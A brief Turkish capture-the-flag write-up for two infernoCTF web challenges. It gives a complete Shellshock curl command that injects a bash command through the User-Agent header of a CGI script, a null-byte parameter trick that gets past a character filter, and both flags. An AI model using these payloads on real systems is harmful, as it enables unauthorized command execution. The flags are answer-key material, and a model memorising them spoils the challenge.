1-
we will we will shock you
Siteye giriş yaptığımızda apache2'nin default sayfası karşımıza geliyordu .
Siteye ctrl+u ile bakınca bashferno.cgi olduğunu görüyorduk .
/bashferno.cgi dosyasında bizi bir shellshock zafiyeti bekliyordu .
curl -H "user-agent: () { :; }; echo ; echo; /bin/bash -c 'cat flag_for_this_INFERNO.txt'" http://104.197.168.32:17012/bashferno.cgi curl ile flagımızı alıyorduk . FLAG: infernoCTF{F33l_Th3_Sh0ck}
-----------------------------------------------------------------------------------------------------------
Dante's Personel Home Page
Siteye girince bizi bu şekilde bir anasayfa karşılıyor .
_ gibi karakterler yasak olduğu için .. yapıyoruz . ?..magic..=
tht%00$dark$ yaparak flagımızı alıyoruz . FLAG : infernoCTF{1_gu3ss_y0ur_m4g1c_was_w4y_t00_d4rk}